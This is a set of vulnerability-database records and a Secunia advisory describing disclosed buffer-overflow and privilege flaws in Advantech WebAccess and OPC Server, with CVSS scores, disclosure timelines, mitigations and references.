Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-132" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-132" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-132", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-132", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-132" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. A heap-based buffer overflow vulnerability exists in a call to strcpy using a string in a NamedObject structure within the input. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-132" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3154", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-132", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-132" } ] }, "id": "VAR-201602-0490", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:04:33.088000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-132" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-132" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-16-132", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-132", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-132", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess webvrpcs Service viewdll1.dll strcpy Heap-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-132" } ], "trust": 0.7 } }
var-201708-1125
Vulnerability from variot
An Incorrect Privilege Assignment issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. A built-in user account has been granted a sensitive privilege that may allow a user to elevate to administrative privileges. Advantech WebAccess Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple stack-based buffer-overflow vulnerabilities 2. Multiple heap-based buffer-overflow vulnerabilities. 3. Multiple memory-corruption vulnerabilities. 4. An SQL-injection vulnerability. 5. A format-string vulnerability. 6. An authentication-bypass vulnerability. 7. A security-bypass vulnerability. 8. A privilege-escalation vulnerability. 9. A remote-code execution vulnerability. An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and gain elevated privileges. This may aid in further attacks. Advantech WebAccess versions prior to V8.2_20170817 are vulnerable. There is a security vulnerability in Advantech WebAccess 8.2_20170817 and earlier versions, the vulnerability is caused by the program not having the correct assigned permissions
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201708-1125", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.2_20170817" }, { "model": "webaccess \u003cv8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess 8.2 20170817", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "ed6c966e-7696-4b6d-91c4-d23a85d19a60" }, { "db": "CNVD", "id": "CNVD-2017-23879" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007576" }, { "db": "CNNVD", "id": "CNNVD-201708-1276" }, { "db": "NVD", "id": "CVE-2017-12711" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007576" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fritz Sands, rgod, Tenable Network Security,an anonymous researcher all working with Trend Micro??s Zero Day Initiative, and Haojun Hou and DongWang from ADLab of Venustech.", "sources": [ { "db": "BID", "id": "100526" } ], "trust": 0.3 }, "cve": "CVE-2017-12711", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "CVE-2017-12711", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "CNVD-2017-23879", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "ed6c966e-7696-4b6d-91c4-d23a85d19a60", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "VHN-103261", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:L/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2017-12711", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-12711", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2017-12711", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2017-23879", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201708-1276", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "ed6c966e-7696-4b6d-91c4-d23a85d19a60", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-103261", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "ed6c966e-7696-4b6d-91c4-d23a85d19a60" }, { "db": "CNVD", "id": "CNVD-2017-23879" }, { "db": "VULHUB", "id": "VHN-103261" }, { "db": "JVNDB", "id": "JVNDB-2017-007576" }, { "db": "CNNVD", "id": "CNNVD-201708-1276" }, { "db": "NVD", "id": "CVE-2017-12711" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "An Incorrect Privilege Assignment issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. A built-in user account has been granted a sensitive privilege that may allow a user to elevate to administrative privileges. Advantech WebAccess Contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple stack-based buffer-overflow vulnerabilities\n2. Multiple heap-based buffer-overflow vulnerabilities. \n3. Multiple memory-corruption vulnerabilities. \n4. An SQL-injection vulnerability. \n5. A format-string vulnerability. \n6. An authentication-bypass vulnerability. \n7. A security-bypass vulnerability. \n8. A privilege-escalation vulnerability. \n9. A remote-code execution vulnerability. \nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and gain elevated privileges. This may aid in further attacks. \nAdvantech WebAccess versions prior to V8.2_20170817 are vulnerable. There is a security vulnerability in Advantech WebAccess 8.2_20170817 and earlier versions, the vulnerability is caused by the program not having the correct assigned permissions", "sources": [ { "db": "NVD", "id": "CVE-2017-12711" }, { "db": "JVNDB", "id": "JVNDB-2017-007576" }, { "db": "CNVD", "id": "CNVD-2017-23879" }, { "db": "BID", "id": "100526" }, { "db": "IVD", "id": "ed6c966e-7696-4b6d-91c4-d23a85d19a60" }, { "db": "VULHUB", "id": "VHN-103261" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-12711", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-17-241-02", "trust": 3.4 }, { "db": "BID", "id": "100526", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201708-1276", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2017-23879", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-007576", "trust": 0.8 }, { "db": "IVD", "id": "ED6C966E-7696-4B6D-91C4-D23A85D19A60", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-103261", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "ed6c966e-7696-4b6d-91c4-d23a85d19a60" }, { "db": "CNVD", "id": "CNVD-2017-23879" }, { "db": "VULHUB", "id": "VHN-103261" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007576" }, { "db": "CNNVD", "id": "CNNVD-201708-1276" }, { "db": "NVD", "id": "CVE-2017-12711" } ] }, "id": "VAR-201708-1125", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "ed6c966e-7696-4b6d-91c4-d23a85d19a60" }, { "db": "CNVD", "id": "CNVD-2017-23879" }, { "db": "VULHUB", "id": "VHN-103261" } ], "trust": 1.582962455 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "ed6c966e-7696-4b6d-91c4-d23a85d19a60" }, { "db": "CNVD", "id": "CNVD-2017-23879" } ] }, "last_update_date": "2024-11-23T21:53:49.689000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Privilege Escalation Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/101163" }, { "title": "Advantech WebAccess Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=74365" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-23879" }, { "db": "JVNDB", "id": "JVNDB-2017-007576" }, { "db": "CNNVD", "id": "CNNVD-201708-1276" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-266", "trust": 1.0 }, { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 }, { "problemtype": "CWE-264", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-103261" }, { "db": "JVNDB", "id": "JVNDB-2017-007576" }, { "db": "NVD", "id": "CVE-2017-12711" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-241-02" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/100526" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12711" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12711" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-23879" }, { "db": "VULHUB", "id": "VHN-103261" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007576" }, { "db": "CNNVD", "id": "CNNVD-201708-1276" }, { "db": "NVD", "id": "CVE-2017-12711" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "ed6c966e-7696-4b6d-91c4-d23a85d19a60" }, { "db": "CNVD", "id": "CNVD-2017-23879" }, { "db": "VULHUB", "id": "VHN-103261" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007576" }, { "db": "CNNVD", "id": "CNNVD-201708-1276" }, { "db": "NVD", "id": "CVE-2017-12711" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-30T00:00:00", "db": "IVD", "id": "ed6c966e-7696-4b6d-91c4-d23a85d19a60" }, { "date": "2017-08-30T00:00:00", "db": "CNVD", "id": "CNVD-2017-23879" }, { "date": "2017-08-30T00:00:00", "db": "VULHUB", "id": "VHN-103261" }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526" }, { "date": "2017-09-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007576" }, { "date": "2017-08-31T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1276" }, { "date": "2017-08-30T18:29:00.827000", "db": "NVD", "id": "CVE-2017-12711" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-30T00:00:00", "db": "CNVD", "id": "CNVD-2017-23879" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-103261" }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526" }, { "date": "2017-12-28T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007576" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1276" }, { "date": "2024-11-21T03:10:04.590000", "db": "NVD", "id": "CVE-2017-12711" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-1276" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerabilities related to authorization, permissions, and access control", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007576" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "permissions and access control issues", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-1276" } ], "trust": 0.6 } }
var-201202-0218
Vulnerability from variot
Stack-based buffer overflow in opcImg.asp in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code via unspecified vectors. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0218", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "19d8c7f0-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0667" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001556" }, { "db": "CNNVD", "id": "CNNVD-201202-414" }, { "db": "NVD", "id": "CVE-2012-0238" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001556" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and 